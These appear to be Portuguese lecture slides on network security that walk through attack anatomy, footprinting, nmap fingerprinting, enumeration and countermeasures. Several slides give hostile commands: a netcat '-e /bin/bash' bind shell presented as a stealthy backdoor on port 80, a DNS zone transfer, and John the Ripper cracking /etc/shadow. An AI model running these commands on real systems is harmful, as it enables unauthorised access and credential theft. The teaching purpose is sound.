Aula 04

Fazer download em pdf ou txt
Fazer download em pdf ou txt
Você está na página 1de 78

Segurança de Redes de Computadores

Agenda de Aula
• Conhecendo o inimigo

• Anatomia de um ataque

• Antes de falar em Footprint vamos falar em Portas

• Footprint

• Fingerprint

• Enumeração

• Mais sobre invasões


Segurança de Redes
Conhecendo o inimigo

Segurança de Redes
Técnicas de invasão
• Porque aprender a atacar?
– Defender-se de quem?
– Do que?
– Como?

• Quem não conhece o inimigo...

• Como protejo o forte se não conheço o


armamento do inimigo?
– Vou para uma guerra usando arcos e flechas?
Segurança de Redes
Técnicas de invasão
As motivações de um ataque

• Notoriedade

• Diversão

• Espionagem http://anchisesbr.blogspot.com.br/2012/11/seguranca-espionagem-industrial.html?spref=tw

• Investigação legal

• Vingança

• Ganho financeiro ilícito


Segurança de Redes
Técnicas de invasão
Elenco

• Alunos, alunos, alunos e as vezes, alunos

• Estagiários

• Prestadores de serviços

• Administradores sem ética

• Agentes da lei

• Bisbilhoteiros e curiosos em geral

• Usuários desastrados (invasões acidentais)


Segurança de Redes
Técnicas de invasão
Um ataque envolve:

• Conhecimento (muito conhecimento)

• Experiência

• Criatividade

• Um pouco de sorte (a ocasião faz o ladrão)

Segurança de Redes
Técnicas de invasão
Origem de um ataque

• Interna (mais frequente do que se imagina)

• Externa (é preciso aplicar técnicas para


aprofundar os conhecimentos sobre o alvo)

Segurança de Redes
Técnicas de invasão
Quem são os atacantes

• Script Kiddies

• Crackers

• Hackers

Segurança de Redes
Técnicas de invasão
Script Kiddies

• “Geralmente” não tem muita habilidade.

• Deu a sorte de encontrar um sistema que não


tinha “patches” de correções aplicados.

• Sua eficiência é inversamente proporcional ao


desleixo de administradores de redes e usuários
que não acompanham listas de segurança.
Segurança de Redes
Técnicas de invasão
Script Kiddies

• “Geralmente” exploram falhas conhecidas

• Não buscam informações ou máquinas


específicas (buscar acesso root).

• Frequentemente procuram acesso para


“defacement”.

Segurança de Redes
Técnicas de invasão
Script Kiddies

• Reviram a Internet atrás de máquinas vulneráveis


e aplicam “exploits” não desenvolvidos por eles.

• Não executam ataques de conhecimento técnico


elevado.

• Não se preocupam com rastros deixados no


sistema.
Segurança de Redes
Técnicas de invasão
Cracker

• Invasor de excelentes conhecimentos técnicos.

• Cada passo da invasão é realmente estudado e


bem pensado.

• Apaga seus rastros de maneira sutil.

• Utilizam seu conhecimentos para atividades


maliciosas.
Segurança de Redes
Técnicas de invasão
Cracker

• Busca dados como configurações ou senhas


padrões que possam ser exploradas.

• Tem capacidade para desenvolver seus próprios


exploits.

• Suas atitudes furtivas podem enganar


administradores experientes.
Segurança de Redes
Técnicas de invasão
Hacker (ético)

• Tão especialistas quanto os crackers.

• Programador ou administrador que se reserva a


questionar problemas de segurança nas
tecnologias disponíveis.

• Invadem para provar esses problemas (você


concorda?).
Segurança de Redes
Técnicas de invasão
Hacker (ético)

• Compartilha conhecimento, geralmente de forma


gratuita.

• Não usa de más intenções, presta um serviço a


comunidade.

Segurança de Redes
Técnicas de invasão
Características de um invasor

• Codificam em várias linguagens de programação (Perl e C++ são


as mais utilizadas).

• Desenvolvem seus próprios exploits.

• Conhecimentos aprofundados em ferramentas, serviços e


protocolos de rede.

• Conhecem a fundo 2 ou mais S.O. (geralmente Windows e


Linux).

• Geralmente aficionados por tecnologia.

• Colecionam softwares e hardware para testes.


Segurança de Redes
Técnicas de invasão
Alguns detalhes sobre V U L N E R A B I L I D A D E S

• Ausência ou fraqueza de proteção cobrindo uma ou mais


ameaças.

• Software, Hardware, Pessoas vulneráveis.

• Vulnerabilidades estão intimamente ligadas as ameaças:

– Ameaça de acesso não autorizado está ligada a ausência de


controle inadequado.

– Ameaça de perda de dados críticos está ligada ao planejamento


ineficaz de contingência.
Segurança de Redes
Anatomia de um ataque

Segurança de Redes
Anatomia de um ataque
• O primeiro passo para entender um ataque é
entender sua anatomia, a forma como é
constituído.

• Basicamente
– Footprint: levantamento de informações
– Fingerprint: saber qual o S.O., quais portas, etc
– Enumeração: selecionar o que pode servir ou não
para um ataque
– Ataque propriamente dito

Segurança de Redes
Anatomia de um ataque
• Numa visão geral Testar as ferramentas
em ambiente controlado

Escolha do alvo, Obter e testar


footprint, fingerprint ferramentas

Fontes públicas
de informação

Privilégios de acesso,
eliminar indícios,
garantir retorno

Exploração dos Aplicar as ferramentas


Resultados testadas contra o alvo

Segurança de Redes
Anatomia de um ataque
• Ataque de Script Kid
Escolha do Levantar Scanners de portas e
alvo informações do alvo vulnerabilidades, varredura
de hosts, identificação de
vulnerabilidades e confs.
N padrões

S Invasão bem Buscar ferramentas em sites


Defacement, sucedida. Acesso de crackers ou de segurança.
modificação de não autorizado
com privilégios Escolher as ferramentas para
dados ataque
no alvo

Segurança de Redes
Anatomia de um ataque
• Ataque de Hacker/Cracker
Footprint
Engenharia Levantar
social informações públicas Fingerprint
e de infraestrutura

N
Enumerar serviços
Invasão bem
sucedida.
disponíveis
Acesso não Enumeração de falhas,
autorizado
com privilégios
configurações padrões e
no alvo exploits para os serviços Varredura de
encontrados vulnerabilidades
S

Instala trojan
Destruição de Um host é violado e será
Instala backdoor
evidências e obtenção utilizado para atacar outros
Instala logclean de retorno facilitado alvos

Segurança de Redes
Anatomia de um ataque
• Ataque de cracker

Máquina invadida não tem nada “interessante”???

– Máquina boa para ser “rooteada”.

– Máquina será utilizada para outras invasões (bots).

– Adivinha quem será o responsável pelos danos causados


quando o ataque for identificado???

– O cracker ainda pode divulgar em canais de IRC de


crackers e script kiddies os backdoors e senhas das
estações comprometidas (laranjas).
Segurança de Redes
Antes de falar em Footprint vamos
falar em Portas
Portas de comunicação
• A forma de identificação de um ponto de acesso
de serviço de rede (OSI ) é a porta de protocolo
TCP/ IP.

• Sockets TCP/ IP = ( IP, portas)

• A porta é a unidade que permite identificar o


tráfego de dados destinado a diversas aplicações.

Segurança de Redes
Portas de comunicação
• Cada processo pode utilizar mais de uma porta
simultaneamente (entrada, saída) , mas, em um
dado instante, uma porta só pode ser usada por
uma aplicação.

• A mesma porta usada por uma aplicação pode ser


usada por outra, desde que a primeira tenha
liberado aquela de utilização.

Segurança de Redes
Portas de comunicação
• A forma de utilização de portas mostra uma
distinção entre a parte cliente e a parte
servidora de uma aplicação TCP/ IP.

• Uma aplicação-servidora deve utilizar um


número de porta bem conhecido (21-ftp, 53-dns,
80-hhtp, 443-hhtps, etc), de modo que um cliente
qualquer, querendo utilizar os serviços do
servidor, tenha que saber apenas o endereço IP
da máquina onde o serviço está sendo executado.

Segurança de Redes
Portas de comunicação
• A aplicação cliente pode utilizar um número de porta
qualquer.

• Os números de porta de 1 a 1023 são números bem


conhecidos para serviços de rede, atribuídos pela
IANA ( Internet Assigned Numbers Authority)

• Lista de portas conhecidas:


http://www.iana.org/assignments/port-numbers

• Os números de 1024 a 65535 podem ser atribuídos


para outros serviços, e são geralmente usados pelos
programas-cliente de um protocolo.
Segurança de Redes
Footprint

Segurança de Redes
Footprint - Conceito
• Busca detalhada de informações sobre o alvo
para intrusão.

• Criar perfil de uma máquina-alvo a ser atacada,


para descobrir falhas a serem exploradas
(configurações e senhas padrões).

• A partir do resultado do footprint é traçada a


estratégia de ataque.

Segurança de Redes
Footprint - Conceito
• Um footprint dura enquanto for necessário.

• Pode ser colocado em prática de muitas


maneiras, é limitado apenas pela imaginação do
atacante.

Segurança de Redes
Footprint - Objetivos
• Levantar informações sobre o domínio
– Nomes de domínios
– Responsáveis
– Servidores

• Identificação de S.O. da máquina alvo (fingerprint)

• Descoberta de subredes

• Serviços TCP/UDP disponíveis

• Topologia da rede
Segurança de Redes
Footprint - Objetivos
• Contas de e-mail, FTP e outros serviços

• Contas de usuários e de grupos

• Banners que identificam versões de serviços

• Identificar roteadores e tabelas de roteamento

• Servidores ocultos por NAT

• Endereços de e-mails

• Informações de servidores SNMP mal configurados

• Estrutura de segurança (Firewall, IDS, Honeypots)


Segurança de Redes
Footprint – Levantar info. domínio
• Whois ou Host (comandos Linux/Unix)
– whois <dominio>
– whois <IP>

• Arin - https://www.arin.net/

• Consulta no registro.br (www.registro.br)

• http://networking.ringofsaturn.com/Tools/whois.php

• http://whois.net/

• http://whois.domaintools.com/

– O domínio está num provedor ou numa estação da própria empresa???


Segurança de Redes
Footprint – Levantar info. domínio
• Consultar base de DNS pelos comandos host,
dig ou nslookup (linux)

• Cada domínio possui uma base de dados DNS dos


subdomínios ali cadastrados.

• Permite a identificação de máquinas importantes.

Segurança de Redes
Footprint – Levantar info. domínio
Comando host
• Descobrindo IPs dos servidores de nome
– host –t ns google.com

• Verifique os IPs desses servidores

• Descobrindo o servidor de e-mail


– host –t mx google.com

Segurança de Redes
Footprint – Levantar info. domínio
• Verificando qualquer servidor
– host –t any google.com

Segurança de Redes
Footprint – Levantar info. domínio
Comando Dig – utilitário para consultas DNS

• Buscando informações sobre o servidor DNS


– dig –t ns <dominio ou IP>

Segurança de Redes
Footprint – Levantar info. domínio
• Buscando informações sobre os servidores de e-mail
– dig –t mx google.com

Segurança de Redes
Footprint – Levantar info. domínio
O comando Dig também faz transferências de Zonas de
DNS: dig @<srv_DNS> <dominio> axfr
1 # dig @dns.dom.com.br dom.com.br axfr
2 ; <<>> DiG 9.1.3 <<>> @dns.dom.com.br dom.com.br axfr
3 ;; global options: printcmd
4 dom.com.br. 86400 IN NS dns.dom.com.br.
5 dom.com.br. 86400 IN NS dns2.dom.com.br.
6 dom.com.br. 86400 IN NS gw.dom.com.br.
7 dom.com.br. 86400 IN MX 10 mail.dom.com.br.
8 mail.dom.com.br. 86400 IN CNAME svr1.dom.com.br.
9 ftp.dom.com.br. 86400 IN CNAME svr1.dom.com.br.
...
10 svr1.dom.com.br. 86400 IN A 164.17.100.20
11 svr1.dom.com.br. 86400 IN HINFO "Pentium III 1GHz"
"Linux Red Hat 6.2"
...
12 fw.dom.com.br. 86400 IN A 164.17.100.1
13 fw.dom.com.br. 86400 IN HINFO "Pentium II 400MHz"
"Linux Red Hat 6.2"
...

Ferramenta dig para usar na Web


www.digwebinterface.com
Segurança de Redes
Footprint – Levantar info. domínio
Comando nslookup

• Consultar qualquer informação de um domínio


> Nslookup
> Set type=any
> google.com

Segurança de Redes
Footprint – Levantar info. domínio
• Comandos traceroute (linux) e tracert (windows)

• Levantamento de rotas de pacotes “numa/entre” redes

• Quais servidores e roteadores existem, topologia da rede, infra de


segurança
traceroute <dominio ou IP>

• Traceroute analisando uma porta específica (testa se há resposta numa


porta específica)
traceroute –p25 <dominio ou IP>

• EX:
#traceroute alvo.sub.dom.br
1 dial.domX.com.br (210.90.136.14) 116.963 ms 119.668 ms 130.050 ms
2 fw.domX.com.br (210.90.136.1) 119.751 ms 119.800 ms 119.907 ms
3 atm.domY.com.br (201.100.129.132) 119.875 ms 119.809 ms 119.917 ms
4 gw.dom.br (201.100.129.4) 119.981 ms 129.798 ms 119.916 ms
5 gw.sub.dom.br (154.34.4.3) 129.896 ms 139.799 ms 129.925 ms
6 154.34.12.2 (154.34.12.2) 129.912 ms 139.797 ms 129.968 ms
7 alvo.sub.dom.br (154.34.8.66) 129.781 ms 139.886 ms 139.868 ms
Segurança de Redes
Footprint – Levantar info. domínio
• Comando Hping - Usado entre outras coisas para:

– Testar regras de firewalls.

– Scaneamento de portas avançado.

– Testar performance da rede usando diferentes protocolos,


tamanhos de pacote, tipos de serviço e fragmentação.

– Descobrir MTU dos pacotes.

– Fingerprinting de servidores remotos.


Segurança de Redes
Footprint – Levantar info. domínio
hping3 –S –p 80 –T <dominio>
• O comando acima busca pelo domínio na porta 80,
usando pacotes SYN e no modo traceroute.

Segurança de Redes
Footprint – Levantar info. domínio
• Troca de e-mails (qualquer leitor de e-mail)

• Informações:
• Nome e versão do servidor SMTP
• Nome e versão do cliente de e-mail do usuário
• Plataformas (servidor e usuário)
• Nomes e endereços de servidores

• Onde procurar
• Cabeçalhos da mensagem

• Como fazer
• Enviar e-mails para usuários internos (pedindo que respondam)
• Enviar e-mails para usuários inexistentes
Segurança de Redes
Footprint – Levantar info. domínio

• Troca de e-mails (qualquer leitor de e-mail)

1 Received: from mail.dominioX.com (localhost.localdomain [127.0.0.1])


2 by dominoX.com (8.11.0/8.11.3) with ESMTP id g32Mn2J53943;
3 Mon, 4 Mar 2001 19:49:01 -0300
4 Received: from smtp.dominioY.com (server.dominioY.com [230.110.90.20])
5 by dominoX.com (8.11.0/8.11.3) with ESMTP id g32Mn2J53943;
6 for <[email protected]>; Mon, 4 Mar 2001 19:48:39 -0300
7 Received: from dominioZ.com (dominioZ.com [230.110.90.25])
8 by dominioZ.com (8.12.1/8.12.1/Debian -5) with ESMTP id ...
9 for <[email protected]>; Mon, 4 Mar 2001 20:49:23 -0300
...
10 Message-ID: <Pine.LNX.4.43.0203042048370.29092-
...

Segurança de Redes
Footprint – Leitura de banners
• Tarefa de ler os banners que identificam serviços para identificar
versões de programas, endereços, etc.

• Para identificar servidor SMTP usar comando Netcat (Linux) na


porta 587 (antiga porta 25) ou SMTPSCAN (linux).

smtpscan –p 587 <dominio ou IP>

Segurança de Redes
Footprint – Leitura de banners

Segurança de Redes
Footprint – Leitura de banners
• Comando Netcat

• Permite ler banners de serviços: nc –vv <IP ou dominio> <porta>


nc –vv mail.alcidesmaya.com.br 587

Teste com seu colega:


• Servidor: nc –nvl –p <porta> -e /bin/bash
• Cliente: nc <IP_servidor> <porta>

• Repita o teste sem o parâmetro “v”: verbose


• Tutorial NC: http://www.pedropereira.net/netcat-nc-tutorial-
linux-windows/
Segurança de Redes
Footprint – Leitura de banners
Contramedidas
• Procurar utilizar a obscuridade por meio da eliminação de
banners nos serviços. Obscuridade não é segurança, mas
ajuda!!!

• Limitar o serviço DNS a rede local, principalmente no que tange


a transferência de zonas

• Fazer atualizações de patches de segurança dos serviços mais


importantes (não sem antes testá-los exaustivamente em
outro servidor)

• Assinar listas de segurança e manter-se atualizado quanto as


correções dos seus serviços. (Security-focus, bugtraq...)
Segurança de Redes
Fingerprint

Segurança de Redes
Fingerprint - Conceito

• Informação fundamental para um invasor buscar uma


possibilidade de intrusão.

• Técnicas Clássicas e mais elaboradas.

• Hackers, Crackers e Script Kiddies utilizam.

• Nmap pode fazer fingerprint na pilha TCP do host-alvo


(usando UDP, TCP, ICMP) .

Segurança de Redes
Fingerprint - Conceito
• NMAP - Network Mapper

• ferramenta livre, de código aberto, utilizada para mapeamento de


redes e inclui diversas funcionalidades como:
– varredura de portas
– detecção de versão de serviços
– identificação remota de sistemas operacionais (OS fingerprinting), etc.

• Criada por Gordon “Fyodor” Lyon, que ainda hoje participa


ativamente do desenvolvimento da mesma.

• O nmap é uma ferramenta versátil que é muito utilizada, entre


outros:
– Auditorias;
– Testes de invasão;
– Testes em firewalls;
– Testes de conformidade;

Segurança de Redes
Fingerprint - NMAP
• Scanners de porta: NMAP (intrusivo)

• Pesquisam faixas de endereços IP.

• Descobre portas abertas (que têm serviços


rodando) .

• Fornece Informações sobre o Sistema Operacional


de uma máquina alvo (Fingerprint ).

Segurança de Redes
Fingerprint - Conceito
• Descoberta de Hosts | Varredura de portas | Detecção de O.S.

Documentação (livro escrito pelo próprio Fyodor):


http://nmap.org/book/toc.html

Site de testes para a ferramenta: scanme.nmap.org

Segurança de Redes
Fingerprint - NMAP
• Descoberta de hosts:
• -sL: “List Scan” -> apenas lista os alvos passados como parâmetro. Não realiza
uma varredura ativa.

• -PN: “No Ping” -> trata todos os hosts como “on-line”, pulando a fase de
descoberta completamente.

• -sP: -> não realiza varredura mas realiza a descoberta de hosts.

• -PR: “ARP Ping” -> método de descoberta de rede padrão utilizado pelo
nmap quando o alvo encontra-se na mesma rede.

• -PE: “ICMP Echo Ping” -> método de descoberta de rede padrão utilizado
pelo nmap quando o alvo encontra-se numa rede externa.

• -PS: “TCP SYN Ping” -> método de descoberta útil para hosts que não
respondem ICMP.

• -PU: “UDP Ping” -> método para descobrir hosts usando UDP.

Segurança de Redes
Fingerprint - NMAP
• Varredura de portas

• -sS: “TCP SYN Scan” -> é o método de varredura mais popular. Envia pacotes TCP com o
flag SYN ligado para as portas alvo:
» Se receber um SYN-ACK: porta aberta
» Se receber um RST: porta fechada
» Se não receber nada: porta filtrada

• -sT: “TCP CONNECT Scan” -> mais lento e menos furtivo, pois a conexão é de fato
estabelecida através do método “connect”. Porém pode ser executada por um usuário sem
privilégios administrativos no sistema.

• -sA: “TCP ACK Scan”-> Envia pacotes TCP com a flag ACK ativa.

• -sN: “NULL Scan” -> Envia pacotes TCP sem nenhuma flag ativa.

• -sF: “TCP FIN Scan” -> Envia pacotes TCP com a flag FIN ativa.

• -sX: “TCP XMAS Scan” -> Envia pacotes TCP com as flags FIN, PSH e URG ativas.

• As opções –sA, -sN, -sF e –sX geralmente são executadas apenas para agregar informações
a outras varreduras já executadas, pois nem sempre oferecem resultados confiáveis (pois
nem todos os sistemas implementam a pilha TCP/IP de acordo com a RFC 793).
Segurança de Redes
Fingerprint - NMAP
• Detecção de serviços e S.O.

• -sV: “Service/Version Info” -> aferir qual serviço e versão estão


rodando na porta especificada.

• -O: “OS Fingerprinting” -> tenta identificar qual o sistema


operacional do alvo.

• nmap –sS –sV –O <IP_vitima>

Segurança de Redes
Fingerprint - NMAP
• Exemplo com comando: nmap –sS –sV –O <IP>

Segurança de Redes
Fingerprint - NMAP
• Mais scanners de porta:

• NetStat (Windows)
• Netcat
• Nmap
• Amap (ideal para leitura de banners)
• Blaster
• Hping2, Hping3

Segurança de Redes
Enumeração

Segurança de Redes
Enumeração
• Enumeração de serviços encontrados para escolha de
onde concentrar esforços.

• HTTP
• SSH
• SMTP/POP
• FTP
• VPN
• MYSQL

• Para ajudar na escolha, podem ser utilizados


scanners de vulnerabilidades.
Segurança de Redes
Enumeração
Sobre Scanners de vulnerabilidades:

• “Se eles trabalhassem da maneira que você espera que eles


trabalhem, todos eles danificariam seus computadores e derrubariam
sua rede. Ninguém usaria uma ferramenta como essa, então eles
disfarçam”.

• Imagine que você está testando as vulnerabilidades da sua casa.

– Como saber se seu vidro é seguro se você não tentar quebrá-lo?

– Talvez você vá verificar o fabricante e o número de série do produto para


verificar vulnerabilidades conhecidas, mas isso é seguro?

– E as vulnerabilidades não conhecidas?

– E se eu, ao tentar verificar vulnerabilidades, causar dano a minha casa?

Segurança de Redes
Enumeração
• Exemplo de scanner de vulnerabilidade: Nessus
http://www.tenable.com/products/nessus

• Tem suporte a Administração Remota

Segurança de Redes
Enumeração
• Tem suporte a Administração Remota

Segurança de Redes
Mais sobre invasões

Segurança de Redes
Invasões
• Conheço os serviços, e agora????

• Uma vez que o invasor conhece os serviços rodando, é


mais fácil escolher qual serviço atacar pois pode
pesquisar uma vulnerabilidade desse serviço e buscar
exploits funcionais para ele ou escrever seus próprios
exploits.

• A grande vulnerabilidade aqui é o desafio inerente aos


administradores de rede, de manter sistemas
atualizados.

• Se conseguir acesso, a ideia é pesquisar arquivos de


senhas e permissões de usuários para escalar
privilégios visando acesso “root” no sistema.
Segurança de Redes
Invasões
• Onde buscar ferramentas para invasões:

• http://www.backtrack-linux.org/

• http://packetstormsecurity.org/

• http://www.phrack.com/

• http://www.securityfocus.com/

• http://www.exploit-db.com
Segurança de Redes
Invasões
• Uma vez que se tem acesso, a ideia é escalar privilégios no
sistema.

• Por “escalar privilégios” entende-se hackear usuários com


privilégios mais altos dentro do sistema.

• Pesquisar nos arquivos de senhas (/etc/passwd ou


/etc/shadow), permissões de usuários visando sempre
acesso “root”.

• Além disso, é possível spoofar e sniffar a rede.

Segurança de Redes
Invasões
• Antigamente as senhas no Linux eram armazenadas no arquivo
/etc/passwd que possuía o formato:

usuário: senha criptografada: UID: GID: Comentários: Diretório home: Shell.

carlos:$1$3ZkVpbv6$z.T9d907rVyIcxUFy3wwk:1014:1014:Usuário contabil:/home/carlos/:/bin/bash

• Como o arquivo “passwd” é legível por todos os usuários estas senhas


podiam ser facilmente crackeadas. Para combater esta vulnerabilidade
foi desenvolvido o sistema de sombreamento de senhas, os shadows
passwords.

• Quando o sistema de sombreamento de senhas está disponível, o


campo “senha” do arquivo /etc/passwd é substituído por um "x" e a
senha do usuário é armazenada no arquivo /etc/shadow.

carlos:x:1014:1014:Usuário contabil:/home/carlos/:/bin/bash
Segurança de Redes
Invasões

• Por esta razão o /etc/shadow é legível somente pelo


usuário root, dificultando a ação de usuários maliciosos
aumentando a segurança das senhas.

• O arquivo /etc/shadow contém as seguintes entradas:

usuário: senha criptografada: tempos de expiração de senhas

Exemplo:

# cat /etc/shadow
carlos:$1$3ZkVpbv6$z.T9d907rVyIcxUFy3wwk.:12643:0:99999:7:::

Segurança de Redes
Invasões

• Uma vez que o usuário consegue permissão de


acesso ao arquivo /etc/shadow, é possível
quebrá-lo como se fosse o /etc/passwd, usando
softwares como o “John the ripper” que faz
ataques de força-bruta.

cd /pentest/passwords/john

./john --users=root /etc/shadow

Segurança de Redes
Invasões
• Backdoors: garantir acessos futuros

• Ferramenta Netcat
• servidor: nc -l -p 80 -e /bin/bash
• cliente: nc servidor 80

• Pode ser utilizada qualquer outra porta, mas a


porta 80 geralmente confunde usuários
descuidados e não gera alardes.

Segurança de Redes
Invasões
• Sempre bom lembrar que o invasor deve estar
preparado para:

– Imprevistos.

– Ser detectado.

– Repetir etapas.

– Uma investida errônea sobre um serviço pode chamar a


atenção do administrador ou até tirar o serviço do ar.

Segurança de Redes
Invasões
• Contramedidas

• Verificadores de Senha (John the Ripper )

• Auditoria de Segurança de Sistemas (Nmap)

• Scanner de Segurança para identificar vulnerabilidades


(Nessus)

• Firewalls, Web Proxy

• IDS de Host (Tripware)

• IDS de rede (Snort )


Segurança de Redes
Invasões
• Contramedidas

• Estabelecimento de Políticas de Segurança

• Informações Criptografadas em protocolos (S/MIME, SSH,


SSL, TSL, IPSec... )

• Uso de certificados digitais

• Excluir informações com segurança

• Usar discos e containers criptografados (principalmente


backup)

• Redes Privadas Virtuais (VPN com SSL, IPSec)


Segurança de Redes
Bibliografia
• Noordergraaf, Alex. Enterprise Server Products. How
Hackers Do It: Trick, Tools and Techniques. Sun
BluePrints™ OnLine – May, 2002:
http://www.sun.com/blueprints
• CERT: http://www.cert.org.
• Nessus: http://www.nessus.org
• Nmap: http://www.nmap.org
• Serafim, Vinícius da Silveira. Atacantes: Suas
principais técnicas e ferramentas. Gseg - UFRGS.
http://www.inf.ufrgs.br/~gseg/
• CVE: http://cve.mitre.org.
• org
Segurança de Redes

Você também pode gostar